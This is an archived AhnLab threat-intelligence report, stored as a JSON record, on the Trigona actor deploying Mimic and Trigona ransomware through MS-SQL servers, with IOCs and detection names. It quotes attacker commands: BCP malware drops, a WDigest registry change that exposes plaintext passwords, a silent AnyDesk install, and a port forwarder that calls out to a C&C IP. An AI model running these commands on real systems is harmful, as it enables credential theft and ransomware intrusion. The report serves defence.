{
	"id": "e1140028-9630-4f73-87b5-d300047c8f2b",
	"created_at": "2026-04-06T00:06:11.209622Z",
	"updated_at": "2026-04-10T03:19:55.517124Z",
	"deleted_at": null,
	"sha1_hash": "81d50f4422b2cdc400363c8f17b0954297964b0e",
	"title": "Trigona Ransomware Threat Actor Uses Mimic Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 893300,
	"plain_text": "Trigona Ransomware Threat Actor Uses Mimic Ransomware\r\nBy ATCP\r\nPublished: 2024-01-21 · Archived: 2026-04-05 22:23:10 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware\r\nthreat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers\r\nand is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware\r\ninstallation process.\r\nTrigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL\r\nservers for attacks and is still active.\r\nMimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].\r\nASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024,\r\nthere were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s\r\nemail address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note\r\nidentified later contained an email address that the Trigona threat actor has been using since early 2023 [4].\r\nAccordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat\r\nactor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early\r\nJanuary 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used\r\nfor malware installation, and the various strings and paths used in attacks were the same. In addition, the same\r\nmalware was used in each attack case.\r\n1. Trigona Ransomware\r\nTrigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files.\r\nA report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].\r\nMS-SQL servers were targeted again in the recent attack case like cases of 2023, and with the threat actor’s email\r\naddress saved in the ransom note, it can be confirmed that the recently detected Trigona ransomware’s threat actor\r\nis the same attacker responsible for previous cases.\r\nEmail: farusbig@tutanota[.]com\r\nURL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 1 of 11\n\nFigure 1. Encrypted files and a ransom note\r\n2. Mimic Ransomware\r\nMimic ransomware is known for exploiting a file search program called Everything while looking for files to\r\nencrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the\r\ntarget system. The attacker also copied some features of Conti ransomware the source code of which was leaked\r\nduring the development stage [7].\r\nThe Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report\r\nreleased in January 2024 almost had the same external structure as the one used in this attack. The malware was\r\nmade into a 7z SFX executable and contains a compressed file named “Everything64.dll” which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and\r\n“Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.\r\n\u003e 7za.exe x -y -p58042791667523172 Everything64.dll\r\n\u003e 7za.exe x -y -p624417568130113444 Everything64.dll\r\nFigure 2. Files included in 7z SFX and the compressed file\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 2 of 11\n\nThe folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the\r\nDefender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of\r\nSysinternals.\r\nFigure 3. Installed files\r\nThe threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples\r\nin the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack\r\ncases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in\r\ntheir attacks based on multiple circumstances that will be discussed later in this post.\r\nEmail: getmydata@list.ru\r\nFigure 4. Encrypted files and a ransom note\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 3 of 11\n\n3. Malware Installed Using BCP\r\nAttack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account\r\ncredentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the\r\nfact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also\r\nfrom infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack\r\nprocesses.\r\n3.1. Files Created Using BCP\r\nThe BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data saved in the tables of the SQL servers as a local file\r\nor to export data files saved in the local system to the SQL server tables.\r\nThreat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently,\r\nsome have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. However, in the case of this\r\nattack case, the threat actor most likely employed the method of saving their malware in a database and using BCP\r\nto create a local file from it.\r\nFigure 5. Creating malware using BCP\r\nThe threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware\r\nbinary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain\r\nformat information.\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 4 of 11\n\nFigure 6. BCP command used in the attacks\r\nThe following are BCP commands used to export various malware and tools used in the attacks.\r\nAnydesk\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\AD.exe” -T -f\r\n“C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nPort forwarder malware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\4.exe” -T -f\r\n“C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nLauncher malware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\pp2.exe” -T -f\r\n“C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\pp2.exe” -T -f\r\n“C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nMimic ransomware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\K2K.txt” -T -f\r\n“C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\K3K.txt” -T -f\r\n“C:\\users\\%ASD%\\FODsOZKgAU.txt”\r\nTrigona ransomware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\build.txt” -T -f\r\n“C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nOthers\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\kkk.bat” -T -f\r\n“C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\kur.bat” -T -f\r\n“C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\kkk.bat” -T -f\r\n“C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\n3.2. Looking Up Information\r\nThe commands that the threat actor first executes before creating the malware with BCP (meaning that the attack\r\nwas successful) are those that look up the infected system’s information as shown below. The threat actor would\r\ninstall malware suitable for the environment based on the information gained through these commands.\r\n\u003e hostname\r\n\u003e whoami\r\n\u003e wmic computersystem get domain\r\n\u003e wmic computersystem get totalphysicalmemory\r\n3.3. Stealing Account Credentials\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 5 of 11\n\nThe Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of\r\nMimikatz were found in the attack process, the attacker sometimes executed a command to configure the\r\nUseLogonCredential registry key to obtain the plain text password using the WDigest security package.\r\n\u003e REG ADD “HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\wdigest” /v\r\nUseLogonCredential /t REG_DWORD /d 0x00000001\r\n3.4. AnyDesk\r\nIn addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration\r\ntool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows\r\na user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.\r\nAnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware\r\nattacker, but also by most threat groups. There are many cases where remote administration tools are used for\r\nlegitimate purposes such as working from home or remote control and management. Accordingly, anti-malware\r\nproducts cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this\r\nfact to install remote administration tools instead of RAT-type malware during the initial access or lateral\r\nmovement phases to control the target system.\r\n\u003e %SystemDrive%\\users\\%ASD%\\music\\AD.exe –install C:\\”Program Files (x86)”\\ –silent\r\n\u003e %SystemDrive%\\”Program Files (x86)”\\AnyDesk-ad_1514b2f9.exe –get-id”\r\n4. Analysis of Malware Used in the Attack\r\nBesides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe\r\nmode being utilized. Two additional malware deemed to have been created by the threat actor were also found in\r\nthe Mimic and Trigona ransomware attacks.\r\nOne is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it\r\nexecutes the program given as an argument. The other is a port forwarder malware which, like the launcher,\r\nregisters itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding\r\nto the address given as an argument.\r\nAccording to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder\r\n“client”.\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 6 of 11\n\nFigure 7. Malware strains created by the threat actor with similar PDB information\r\nAlthough no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified as shown below. As the launcher\r\ndeactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat\r\nactor installed the malware and then rebooted the system in safe mode to run the ransomware.\r\n\u003e shutdown -r -f -t 5\r\n4.1. Launcher Malware\r\nThe threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher\r\ncopies itself into the “C:\\windows\\temp\\LeVfeNXHoa” path. It then carries out the next task according to the\r\ngiven argument. The first argument gives the service name and the second argument gives the path of the file to be\r\ncopied. The file in the path given by the second argument is moved to the path given by the third argument. The\r\nfile given through the second argument was the Mimic ransomware.\r\n\u003e %ALLUSERSPROFILE%\\pp2.exe 1111111 c:\\programdata\\K2K.txt c:\\programdata\\2K.EXE”\r\nThe launcher registers itself as a service under the name “1111111” which was given as the first argument and runs\r\nadditional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as\r\nthe third argument while running as a service. When the process is complete, it deactivates the safe mode option,\r\nallowing the system to be booted up normally again.\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 7 of 11\n\nFigure 8. Routine of setting the safe mode option for the registered service and deactivating this option after\r\nexecuting the ransomware\r\n4.2. Port Forwarder\r\nThe threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature\r\nwhere data transmitted from a certain port is forwarded to another port. This malware supports port forwarding to\r\nthe RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the\r\nthreat actor cannot directly access the NAT environment from outside.\r\nThe port forwarder first connects to the threat actor’s address using the reverse connection method and then\r\nconnects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able\r\nto establish an RDP connection even if the target system is running in a NAT environment, allowing them to\r\ncontrol the infected system remotely. Because RDP is utilized in this manner, malware may execute the following\r\ncommands to additionally enable the RDP service.\r\nFigure 9. RDP service activation routine\r\nWhen the port forwarder is executed in installation mode, it copies itself into the\r\n“C:\\windows\\temp\\WindowsHostServicess.exe” path and registers itself as a service under the name\r\n“WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware\r\nabove.\r\n\u003e %SystemDrive%\\users\\%ASD%\\music\\4.exe –ip “2.57.149[.]233” –port “3366” –install\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 8 of 11\n\nThe port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and\r\nexecution features. In execution mode, it does not go through the service installation process mentioned above and\r\ninstead connects to the C\u0026C server given as an argument to support port forwarding.\r\nArgument Description\r\n–install Installation mode\r\n–uninstall Uninstallation mode\r\n–run Execution mode\r\n–ip C\u0026C server’s IP address\r\n–port C\u0026C server’s port number\r\nTable 1. Port forwarder arguments\r\nBefore connecting to the C\u0026C server, it saves basic system information such as the OS info and user and\r\ncomputer names in the “C:\\windows\\temp\\elZDk6geQ8” path, transmitting the information upon the initial\r\nconnection.\r\nFigure 10. System information forwarded to the C\u0026C server\r\nThen, it can perform port forwarding or auto-deletion commands based on the commands it receives from the\r\nC\u0026C server.\r\nCommand Feature\r\n0x8CC03FAF Start port forwarding between the C\u0026C server and the RDP service\r\n0x0002C684 Auto-delete\r\nTable 2. Port forwarder arguments\r\n5. Conclusion\r\nRecently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly\r\nmanaged MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding\r\nto establish an RDP connection to the infected system and control it remotely.\r\nRansomware threat actors encrypt infected systems and extort sensitive information to threaten the victims to raise\r\nprofits. Because they employ various techniques for account credential theft and lateral movement, single systems\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 9 of 11\n\nas well as the entire internal company network may be at risk of being compromised, resulting in having sensitive\r\ndata stolen and systems in the network encrypted.\r\nTypical attacks that target MS-SQL servers include brute force attacks and dictionary attacks to systems where\r\naccount credentials are poorly being managed. Administrators must use passwords that cannot be easily guessed\r\nand change them periodically to protect the database servers from brute force and dictionary attacks.\r\nV3 must also be updated to the latest version to block malware infection in advance. Administrators should also\r\nuse security programs such as firewalls for database servers accessible from outside to restrict access by external\r\nthreat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware\r\ncan occur.\r\nFile Detection\r\n– Trojan/Win.Generic.R531737 (2022.10.27.00)\r\n– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)\r\n– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)\r\n– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)\r\n– Trojan/Win.Agent.C5574264 (2024.01.14.03)\r\n– Trojan/Win.Agent.C5574265 (2024.01.14.03)\r\nBehavior Detection\r\n– Malware/MDP.Minipulate.M71\r\n– Persistence/MDP.AutoRun.M203\r\n– DefenseEvasion/MDP.ModifyRegistry.M1234\r\n– Ransom/MDP.Decoy.M1171\r\n– CredentialAccess/MDP.Mimikatz.M4367\r\nMD5\r\n3e26e778a4d28003686596f988942646\r\n6d44f8f3c1608e5958b40f9c6d7b6718\r\na02157550bc9b491fd03cad394ccdfe7\r\na24bac9071fb6e07e13c52f65a093fce\r\na6e2722cff3abb214dc1437647964c57\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//2[.]57[.]149[.]233[:]3366/\r\nAdditional IOCs are available on AhnLab TIP.\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 10 of 11\n\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/61000/\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 11 of 11\n\n“WindowsHostServicess”. above. The service is configured so that it can be run in safe mode like the launcher malware\n\u003e %SystemDrive%\\users\\%ASD%\\music\\4.exe -ip “2.57.149[.]233” -port “3366”-install\n Page 8 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/61000/"
	],
	"report_names": [
		"61000"
	],
	"threat_actors": [],
	"ts_created_at": 1775433971,
	"ts_updated_at": 1775791195,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.pdf",
		"text": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.txt",
		"img": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.jpg"
	}
}